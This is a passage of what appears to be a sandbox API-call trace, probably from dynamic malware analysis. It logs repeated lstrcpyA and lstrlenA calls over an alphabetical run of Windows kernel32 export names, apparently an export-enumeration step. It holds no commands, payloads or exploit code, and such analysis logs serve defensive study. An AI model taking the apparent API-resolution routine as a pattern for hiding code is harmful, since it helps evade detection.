returned="CancelThreadpoolIo" [0087.007] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.007] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.007] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.007] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.008] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.008] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.008] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.008] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.008] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.008] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.008] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.008] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.008] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.008] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.008] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.008] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.008] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.008] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.008] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.008] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.008] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.008] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.008] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.009] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.009] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.009] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.009] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.009] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.009] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.009] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.009] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.009] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.009] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.009] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.009] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.009] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.009] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.009] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.009] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.009] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.009] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.009] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.010] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.010] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.010] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.010] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.010] lstrlenA (lpString="COPYFILEA") returned 9 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.010] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.010] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.010] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.010] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.010] lstrlenA (lpString="COPYFILEW") returned 9 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.010] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.010] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.010] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.010] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.010] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.010] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.010] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.010] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.010] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.010] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.011] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.011] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.011] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.011] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.011] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.011] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.011] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.011] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.011] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.011] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.011] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.011] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.011] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.011] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.011] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.011] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.011] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.011] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.011] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.012] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.012] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.012] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.012] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.012] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.012] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.012] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.012] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.012] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.012] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.012] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.012] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.012] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.012] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.012] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.012] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.012] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.012] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.012] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.013] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.013] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.013] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.013] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.013] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.013] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.013] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.013] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.013] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.013] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.013] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.013] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.013] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.013] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.013] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.013] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.013] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.013] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.013] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.013] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.013] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.013] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.013] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.013] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.013] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.013] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.013] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.013] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.013] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.013] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.013] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.014] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.014] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.014] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.014] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.014] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.014] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.014] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.014] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.014] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.014] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.014] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.014] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.014] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.014] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.014] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.014] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.014] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.014] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.014] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.014] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.015] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.015] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.015] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.015] lstrcpyA 